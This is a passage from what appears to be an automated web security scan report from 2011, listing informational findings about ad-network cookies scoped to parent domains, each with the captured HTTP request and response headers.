Set-Cookie: ses15=13378^2&13209^2&12566^3&12359^1; expires=Mon, 03-Oct-2011 04:59:59 GMT; max-age=28917; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3188004.js^2^1317599406^1317599882&2748761.js^1^1317599431^1317599431&3226249.js^2^1317599341^1317599383&3209195.js^2^1317595891^1317598688; expires=Sun, 09-Oct-2011 23:58:02 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 1975

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...
13.98. http://optimized-by.rubiconproject.com/a/8154/13209/25051-1.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/8154/13209/25051-1.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/8154/13209/25051-1.js?cb=0.5513019266072661&fr=false HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home/0,,12306,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; csi9=3197484.js^1^1317161525^1317161525; cd=false; lm="27 Sep 2011 22:12:09 GMT"; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; ruid=154e62c97432177b6a4bcd01^8^1317595852^840399722; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; csi2=3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; ses2=13378^2; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ses15=13378^2; csi15=3209195.js^2^1317595891^1317598688

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:48:53 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=8154/13209; expires=Mon, 03-Oct-2011 00:48:53 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk1=0; expires=Mon, 03-Oct-2011 00:48:53 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses1=13209^2; expires=Mon, 03-Oct-2011 04:59:59 GMT; max-age=29466; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi1=3226251.js^2^1317599333^1317599333; expires=Sun, 09-Oct-2011 23:48:53 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1423

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3226251"
...[SNIP]...
13.99. http://optimized-by.rubiconproject.com/a/8154/13209/25051-15.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/8154/13209/25051-15.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/8154/13209/25051-15.js?cb=0.1704533719457686&fr=false HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home/0,,12306,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; csi9=3197484.js^1^1317161525^1317161525; cd=false; lm="27 Sep 2011 22:12:09 GMT"; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; csi2=3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; ses2=13378^2; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ses15=13378^2; csi15=3209195.js^2^1317595891^1317598688; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rdk=8154/13209; rdk1=0; ses1=13209^1; csi1=3226251.js^1^1317599333^1317599333

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:49:01 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=8154/13209; expires=Mon, 03-Oct-2011 00:49:01 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Mon, 03-Oct-2011 00:49:01 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=13378^2&13209^2; expires=Mon, 03-Oct-2011 04:59:59 GMT; max-age=29458; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3226249.js^2^1317599341^1317599341&3209195.js^2^1317595891^1317598688; expires=Sun, 09-Oct-2011 23:49:01 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1324

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3226249"
...[SNIP]...
13.100. http://optimized-by.rubiconproject.com/a/8154/13209/25051-8.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/8154/13209/25051-8.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/8154/13209/25051-8.js?cb=0.03134333691559732&fr=false HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/SearchResults/?searchQuery=soccor+football+goal+tv+xss&page=2229476&page=2231401&page=2232085&page=2232088&page=2232090&page=2233530&order=date
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; csi9=3197484.js^1^1317161525^1317161525; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses2=13378^2&12566^1; csi2=3188003.js^1^1317599406^1317599406&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; cd=false; lm="2 Oct 2011 23:50:10 GMT"; csi15=2748761.js^1^1317599431^1317599431&3188004.js^1^1317599406^1317599406&3226249.js^2^1317599341^1317599383&3209195.js^2^1317595891^1317598688; ses15=13378^2&13209^2&12566^1&12359^1; rdk=8154/13209; rdk1=0; ses1=13209^3; csi1=3226929.js^1^1317599456^1317599456&3226251.js^2^1317599333^1317599350

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:53:38 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=8154/13209; expires=Mon, 03-Oct-2011 00:53:38 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk8=0; expires=Mon, 03-Oct-2011 00:53:38 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses8=13209^2; expires=Mon, 03-Oct-2011 04:59:59 GMT; max-age=29181; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi8=3226247.js^2^1317599462^1317599618; expires=Sun, 09-Oct-2011 23:53:38 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1324

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3226247"
...[SNIP]...
13.101. http://optimized-by.rubiconproject.com/a/dk.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/dk.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/dk.js?defaulting_ad=x29f159.js&size_id=15&account_id=7743&site_id=12359&size=300x250 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6391&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; csi9=3197484.js^1^1317161525^1317161525; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses1=13209^2; csi1=3226251.js^2^1317599333^1317599350; ses2=13378^2&12566^1; csi2=3188003.js^1^1317599406^1317599406&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; cd=false; lm="2 Oct 2011 23:50:10 GMT"; rdk=7743/12359; ses15=13378^2&13209^2&12566^1&12359^1; csi15=2748761.js^1^1317599431^1317599431&3188004.js^1^1317599406^1317599406&3226249.js^2^1317599341^1317599383&3209195.js^2^1317595891^1317598688

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:52:41 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7743/12359; expires=Mon, 03-Oct-2011 00:52:41 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=1; expires=Mon, 03-Oct-2011 00:52:41 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=13378^2&13209^2&12566^16cd1be6a76b2fd99d77d4996&12359^10; expires=Mon, 03-Oct-2011 04:59:59 GMT; max-age=29238; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1426

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3198298"
...[SNIP]...
13.102. http://pixel.rubiconproject.com/di.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /di.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /di.php?v=2372||2373|0||3810||2374||&r=3761|0,3169,3578,3577,2110,2195,2196,2197,2579,2198,4134,3734,2199,2364,2362,2363,2200,3810,2111,2494,2201,3513,2202,2496,2202,2496,2203,2204,2189,2112,2497,2205,2355,2495,5838,3811,3512,2109,3812,2239,2190,2206,2113,2206,2113,4552,2765,6184,2240,4105,4193,2372,2373,2374,2375, HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; rpx=4940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C694%2C3%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C552%2C14%2C%2C%265671%3D14742%2C608%2C2%2C%2C%264212%3D14742%2C154%2C2%2C%2C%267935%3D14742%2C0%2C1%2C%2C%266073%3D14742%2C608%2C2%2C%2C%267727%3D14742%2C553%2C3%2C%2C%265852%3D14742%2C488%2C2%2C%2C%266286%3D14843%2C141%2C2%2C%2C%266643%3D14894%2C0%2C1%2C%2C%264554%3D15350%2C0%2C1%2C%2C; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; lm="2 Oct 2011 23:50:10 GMT"; ses8=13209^1; csi8=3226247.js^1^1317599462^1317599462; csi2=3188003.js^2^1317599406^1317599882&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; csi15=3226249.js^3^1317599341^1317599886&3188004.js^2^1317599406^1317599881&2748761.js^1^1317599431^1317599431&3209195.js^2^1317595891^1317598688; ses1=13209^5; csi1=3226243.js^1^1317599890^1317599890&3226929.js^2^1317599456^1317599882&3226251.js^2^1317599333^1317599350; ses9=12359^1; csi9=3154654.js^1^1317599933^1317599933; ses2=13378^2&12566^2&12359^1; rdk=7743/12359; ses15=13378^2&13209^3&12566^2&12359^2; cd=false; khaos=GT3FYRAA-6-CO8F

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:01:11 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1%262372%3D1%263810%3D1%262374%3D1; expires=Sat, 31-Mar-2012 00:01:11 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;
13.103. http://pixel.rubiconproject.com/tap.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tap.php?v=6432&rnd1317601647 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://seg.sharethis.com/getSegment.php?purl=http%3A%2F%2Fwww.igougo.com%2Ftraveldeals%2Fratefinder.aspx%3FTypeID%3D1%26SourceID%3DTVLY-dRF-Popunder%26adlt%3D1%26end%3DBoston%26rm%3D1%26dest%3DBoston%2C%2520undefined%2520undefined%26strtDate%3D10%2F04%2F2011%26endDate%3D10%2F07%2F2011&jsref=http%3A%2F%2Fwww.travelocity.com%2FpopWindow2%3FtheDomain%3Dwww.travelocity.com%26selectedForm%3Dcb-form-ho%26formPrefix%3DHO%26fromDate%3Ddd%26fromMonth%3Dmm%26fromYear%3Dyyyy%26toDate%3Ddd%26toMonth%3Dmm%26toYear%3Dyyyy%26theAdtoShow%3Dad2%26dest%3DBOS%26triptype%3D%26noOfRooms%3D1%26noOfAdults%3D1%26service%3DTRAVELOCITY%26oneway%3D&rnd=1317601643778
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1197=3620501663059719663; rpx=4940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C694%2C3%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C552%2C14%2C%2C%265671%3D14742%2C608%2C2%2C%2C%264212%3D14742%2C154%2C2%2C%2C%267935%3D14742%2C0%2C1%2C%2C%266073%3D14742%2C608%2C2%2C%2C%267727%3D14742%2C553%2C3%2C%2C%265852%3D14742%2C488%2C2%2C%2C%266286%3D14843%2C141%2C2%2C%2C%266643%3D14894%2C0%2C1%2C%2C%264554%3D15350%2C0%2C1%2C%2C; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; lm="2 Oct 2011 23:50:10 GMT"; ses8=13209^1; csi8=3226247.js^1^1317599462^1317599462; csi2=3188003.js^2^1317599406^1317599882&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; csi15=3226249.js^3^1317599341^1317599886&3188004.js^2^1317599406^1317599881&2748761.js^1^1317599431^1317599431&3209195.js^2^1317595891^1317598688; ses1=13209^5; csi1=3226243.js^1^1317599890^1317599890&3226929.js^2^1317599456^1317599882&3226251.js^2^1317599333^1317599350; ses9=12359^1; csi9=3154654.js^1^1317599933^1317599933; ses2=13378^2&12566^2&12359^1; ses15=13378^2&13209^3&12566^2&12359^2; cd=false; khaos=GT3FYRAA-6-CO8F; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1%262372%3D1%263810%3D1%262374%3D1

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:27:30 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1%262372%3D1%263810%3D1%262374%3D1%266432%3D1; expires=Wed, 02-Nov-2011 00:27:30 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=4940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C694%2C3%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C612%2C16%2C%2C%265671%3D14742%2C608%2C2%2C%2C%264212%3D14742%2C154%2C2%2C%2C%267935%3D14742%2C0%2C1%2C%2C%266073%3D14742%2C608%2C2%2C%2C%267727%3D14742%2C553%2C3%2C%2C%265852%3D14742%2C488%2C2%2C%2C%266286%3D14843%2C141%2C2%2C%2C%266643%3D14894%2C0%2C1%2C%2C%264554%3D15350%2C0%2C1%2C%2C%262372%3D15352%2C0%2C1%2C%2C%263810%3D15352%2C0%2C1%2C%2C%262374%3D15352%2C0%2C1%2C%2C; expires=Wed, 02-Nov-2011 00:27:30 GMT; path=/; domain=.pixel.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;
13.104. http://r.openx.net/set  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.openx.net
Path:   /set

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /set?pid=25afcb2d-854d-efb2-7940-1323bbd101a7&rtb=f9bdca69-e609-4297-9145-48ea56a0756c HTTP/1.1
Host: r.openx.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?refresh=40&zoneid=6511&cb=INSERT_RANDOM_NUMBER_HERE&loc=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s=ba6bf0b1-8895-45a9-97a1-53f788c412d7; i=d2a43928-76cd-49ea-b899-b41fb371435f; p=1317599506

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:51:48 GMT
Server: Apache
Cache-Control: public, max-age=30, proxy-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: i=d2a43928-76cd-49ea-b899-b41fb371435f; expires=Tue, 01-Oct-2013 23:51:48 GMT; path=/; domain=.openx.net
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;
13.105. http://r.turn.com/r/beacon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/beacon

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/beacon?b2=ZkSA7I0AZ4MffR9fYJOaS7OUxk4yIsAo0Hjd6QMr-OTL4k0mREyxv90izWMmaVqB6KZp_AsihChRf9hcbm1UDQ&cid= HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/results.jsp?searchTokenId=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
